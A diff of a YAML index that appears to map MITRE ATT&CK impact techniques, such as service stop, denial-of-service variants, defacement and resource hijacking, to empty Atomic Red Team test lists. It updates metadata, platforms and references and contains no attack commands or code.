+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -57840,10 +58595,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -57854,39 +58613,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57904,13 +58661,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57918,36 +58682,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57956,11 +58711,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57969,17 +58730,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57988,6 +58763,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -58003,17 +58779,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -58023,14 +58794,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -58039,28 +58811,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -58071,7 +58843,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -58082,17 +58853,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -58129,7 +58895,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -58150,7 +58917,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -58177,12 +58944,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -58215,7 +59048,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -58225,10 +59058,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -58291,7 +59123,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -58332,7 +59163,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -58353,9 +59184,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
